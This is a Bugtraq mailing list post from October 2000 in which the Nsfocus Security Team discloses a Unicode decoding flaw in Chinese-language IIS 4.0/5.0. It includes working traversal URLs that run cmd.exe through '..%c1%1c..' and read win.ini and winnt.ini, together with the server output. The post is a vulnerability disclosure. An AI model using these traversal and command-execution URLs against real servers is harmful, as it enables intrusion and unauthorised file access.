Bugtraq mailing list archives

Re: IIS %c1%1c remote command execution

From: Nsfocus Security Team <security () NSFOCUS COM>
Date: Wed, 18 Oct 2000 15:35:31 +0800

We found this bug several weeks ago.
When we are ready to report it to Microsoft , we found it has been posted in BugTraq.

A member of our team disassembled the IIS 5.0 (Chinese version) Unicode decoding
implementation, he found a  strange decoding method when IIS found "%c1%hh" and
"%c0%hh" (0x00<= 0xhh < 0x40)

IIS will decode "%c1%hh" to  (0xc1 -0xc0) * 0x40 + 0xhh.
IIS will decode "%c0%hh" to  (0xc0 -0xc0) * 0x40 + 0xhh.


example (Windows 2000 + IIS 5.0 + SP1 for Simplify Chinese version):

http://192.168.8.48/A.ida/%c1%00.ida
IIS said"@.ida" can't be found
here: （0xc1-0xc0)*0x40+0x00=0x40='@'

http://192.168.8.48/A.ida/%c1%01.ida
IIS said "A.ida" can't be found
here: （0xc1-0xc0)*0x40+0x01=0x41='A'

http://192.168.8.48/A.ida/%c1%02.ida
IIS said "B.ida" can't be found
....

http://192.168.8.48/A.ida/%c0%21.ida
IIS said "!.ida" can't be found
...

It means you can encode most characters with this feature.
For example:

%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'

We guess that we can use it to bypass some directory restriction:

(1)
http://192.168.8.48/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

Now we get:

 Directory of d:\inetpub\scripts

2000-09-28  15:49       <DIR>          .
2000-09-28  15:49       <DIR>          ..
1999-07-21  17:49              147,456 Count.exe
2000-09-12  17:08              438,290 Count25.exe
2000-10-13  15:03                8,867 counter.err
2000-08-23  23:07              160,002 counter.exe
1999-05-25  18:14                3,925 CountNT.html
1999-07-21  17:49               64,512 extdgts.exe
2000-08-10  15:24               46,352 ism.dll
1999-07-21  17:49               64,512 mkstrip.exe
1999-05-25  18:18                1,317 README.txt
2000-09-28  15:49       <DIR>          wcount
               9 File(s)        935,233 bytes

(2) we can get the content of some system files with this bug too:

http://192.168.8.48/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini

IIS deems it to be a request for a .ASP file.It will call asp.dll to open
the file win.ini.

For IIS 4.0+SP6(Chinese), the URL above failed. It seems that IIS is getting
smarter. But we found it is interesting that we can use this malformed URL
to trick IIS to get the winnt.ini:

http://192.168.8.100/default.asp/a.exe/..%c1%1c../..%c1%1c../winnt/winnt.ini

"default.asp" should be an existing .ASP file.
"a.exe" is random .EXE file name. It can be a nonexisting file.

It looks  IIS 4.0/5.0 for English version has different decoding implementation.

---Original Message---

Recently I received an email from Par Osterberg that directed my attention
to a post in the Packetstorm forums:

http://209.143.242.119/cgi-bin/cbmc/forums.cgi?authkey=anonymous&uname=anonymous&datopic=Windows&mesgcheck=defined&gum=474&editoron=

[...]


- rain forest puppy


Regards,
Nsfocus Security Team <security () nsfocus com>
http://www.nsfocus.com

Current thread:

IIS %c1%1c remote command execution rain forest puppy (Oct 17)
- Re: IIS %c1%1c remote command execution Florian Weimer (Oct 18)
  - Re: IIS %c1%1c remote command execution rain forest puppy (Oct 19)
    - [LoWNOISE] addendum %c1%1c IIS 4.0/5.0 Remote command execution ET LoWNOISE (Oct 20)
- <Possible follow-ups>
- Re: IIS %c1%1c remote command execution Nsfocus Security Team (Oct 18)
- Re: IIS %c1%1c remote command execution Cris Bailiff (Oct 19)